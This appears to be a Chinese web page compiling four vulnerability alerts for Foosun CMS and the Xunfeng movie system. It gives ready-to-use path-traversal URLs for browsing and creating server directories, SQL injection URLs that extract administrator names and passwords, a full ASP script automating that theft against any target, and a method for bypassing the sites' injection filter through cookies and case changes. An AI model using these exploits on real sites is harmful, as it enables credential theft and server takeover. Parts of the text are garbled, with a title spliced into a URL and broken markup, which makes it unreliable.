“gzroyal”通过精心收集,向本站投稿了4篇风讯浏览目录创建文件漏洞漏洞预警,这次小编给大家整理后的风讯浏览目录创建文件漏洞漏洞预警,供大家阅读参考,也相信能帮助到您。

风讯浏览目录创建文件漏洞漏洞预警

篇1:风讯浏览目录创建文件漏洞漏洞预警

简要描述:

通过测试发现该程序FolderImageList.asp FolderImageList.asp FileManage.asp 几个脚本程序在处理用户提交的恶意路径参数时没有进行控制过滤,导致攻击者可以进行服务器目前查看,创建等操作,恶意攻击者可以利用该缺陷进行脚本木马的创建利用,导致服务器被控制,

详细说明:

先注册用户名登录我后执行下边的命令就可以了

1 游览目录文件

192.168.1.62/User/CommPages/FolderImageList.asp?CurrPath=/admin/

2 创建一个目录

192.168.1.62/User/CommPages/FolderImageList.asp?CurrPath=/123456/

3 修改一个目录名称

192.168.1.62/User/FileManage.asp?Type=FolderReName&OldFileName=../../123456&NewFileName=654321

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

篇2:风讯CMS 0DAY exploits漏洞预警

关键字: inurl:User/Reg_service.asp

风讯的注册页面...

漏洞页面:/user/SetNextOptions.asp

利用方法:

构造注入

风讯浏览目录创建文件漏洞漏洞预警user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin

“admin_name”管理用户名数据库表

user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,admin_pass_word,3,4,5,6,7,8++from+FS_MF_Admin

“admin_pass_word”管理密码数据库表

把下面的代码保存成一个ASP文件然后在本地架一个ASP环境就OK了

DE>foosun cms 0day exploits<%web=request(“web”)id=request(“id”)%>关键字:会员注册step 1 of 4 step

输入地址:<%=web%>“>

要暴的ID号(默认是1)<%=id%>”>ID为1的是超级管理员

<% function bin2str(bin)    dim tmp,ustr    tmp=“”    for i=1 to LenB(bin)-1      ustr=AscB(MidB(bin,i,1))      if ustr>127 then        i=i+1        tmp=tmp&chr(ustr*256+AscB(MidB(bin,i,1)))      else        tmp=tmp&chr(ustr)      end if    next    bin2str=tmp  end functionwebuser=web&“User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=”&idwebpass=web&“User/setnextoptions.asp?EquValue=1&ReqSql=select%201,ADMIN_pass_word,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20FS_MF_ADMIN%20where%20id=”&idif web=“” thenelseset x=server.createObject(“Microsoft.XMLHTTP”)  x.open “get”,webuser,false  x.send  str=bin2str(x.responseBody)response.write “你暴的网站地址:”&web&“

第”&id&“位的管理员

”response.write “

网站后台地址

”for i=126 to len(str)mid1=mid1&mid(str,i,1)nextresponse.write “

------------------

帐号:”&mid1&“

”x.open “get”,webpass,false  x.send  str=bin2str(x.responseBody)for i=126 to len(str)mid2=mid2&mid(str,i,1)next response.write “

密码:”&mid2&“

------------------

” response.write “

爆出咯,可以YY了

cmd5”  set x=nothingend if%>DE>

具体的利用方法请参考源码,

风讯CMS 0DAY exploits漏洞预警

篇3:风讯.net版任意代码执行(官方已经demo)漏洞预警

注册用户,发表文章,抓包改包,打死

先看看上传目录有没执行权限,发现没有,看来要在包里做手脚

篇4:讯风影视系统 注册处注入和鸡肋的防注入漏洞预警

影响版本:迅风影视系统

:www.gxwglm.com

漏洞类型:SQL注入

漏洞描述:讯风影视系统存在多处SQL注入漏洞,

#1.注册处注入:

wwwroot\reg\reg.asp

<% szPath = “../../” %> /*包含了也可以绕过 请看#2*/  <% if Request.Form(“submit”) “” then szUserName = Request.Form(“UserName”) szPassWord = Request.Form(“UserPass”) szEmail = Request.Form(“UserMail”) szMemo = Request.Form(“UserMemo”) iPayMode = Request.Form(“PayMode”) szPBQuestion = Request.Form(“PBQuestion”) szPBAnswer = Request.Form(“PBAnswer”) szGetCode = Trim(Request.Form(“codestr”)) szSQL = “SELECT * FROM MOVIE_Users WHERE UserName='” & szUserName & “' OR UserEmail='” & szEmail & “'” set rsData_User = Server.CreateObject(“ADODB.Recordset”) rsData_User.Open szSQL,conn,1,3 if not rsData_User.EOF then Response.Write “” Response.End else iAccount = 0 if Session(“Option_RegMode”) = 1 then iAccount = 10 If IsEmpty(Session(“VerifyCode”)) Or szGetCode CStr(Session(“VerifyCode”)) Then Response.Write “” Response.End end if  if Left(szUserName, 1) = “!” then Response.Write “” Response.End end if  szSQL = “INSERT INTO MOVIE_Users(UserName,UserPass,UserRegisterTime,MovieEdate,UserEmail,UserInfo,MovieUserType,UserSign,UserBio,UserAccountStatus) ” szSQLszSQL = szSQL & “VALUES('” & szUserName & “','” & MD5(szPassWord) & “','” & now & “','” & date+30 & “','” & szEmail & “','” & szMemo & “',” & iPayMode & “,'” & szPBQuestion & “','” & szPBAnswer & “',1)” conn.Execute szSQL Response.Write “” Response.End end if rsData_User.Close end if   UserName,UserPass,UserRegisterTime,MovieEdate,UserEmail,UserInfo,MovieUserType,UserSign,UserBio,UserAccountStatus  等等变量都经过很鸡肋的防注入过滤就insert进movie_user里面 一切都是防注入惹的祸

wwwroot/Conn.asp

<% Response.Addheader “Content-Type”,“text/html; charset=GB2312”  Response.Buffer=True Server.ScriptTimeOut=9999999 '防注入 if nochecksqlin1 then dim sql_injdata,SQL_inj,SQL_Get SQL_injdata = “'|exec |delete |insert | update |select ” SQL_inj = split(SQL_Injdata,“|”)  If Request.QueryString“” Then For Each SQL_Get In Request.QueryString For SQL_Data=0 To Ubound(SQL_inj) if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then Response.Write “” Response.end end if next Next End If  If Request.Form“” Then For Each Sql_Post In Request.Form For SQL_Data=0 To Ubound(SQL_inj) if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then Response.Write “” Response.end end if next next end if end if %>

#2.1 防get 防post 就是没防cookies注入

利用在wwwroot/FZPLAYER.ASP处:

<% Progid=Request(“progid”) Set Rs=CreateObject(“Adodb.RecordSet”) Rs.Open “Select * From Movie_FileList Where FileListID=”&progid,Conn,1,1 Response.Write “” Rs.Close %>#2.2

SQL_injdata = “'|exec |delete |insert | update |select ”

SQL_inj = split(SQL_Injdata,“|”)

过滤的关键字少是一回事 主要是大小写都没注意到,

Exec这样的就可以绕过防注入 大摇大摆的注入吧各位黑阔

阅读剩余 0%
本站所有文章资讯、展示的图片素材等内容均为注册用户上传(部分报媒/平媒内容转载自网络合作媒体),仅供学习参考。 用户通过本站上传、发布的任何内容的知识产权归属用户或原始著作权人所有。如有侵犯您的版权,请联系我们反馈本站将在三个工作日内改正。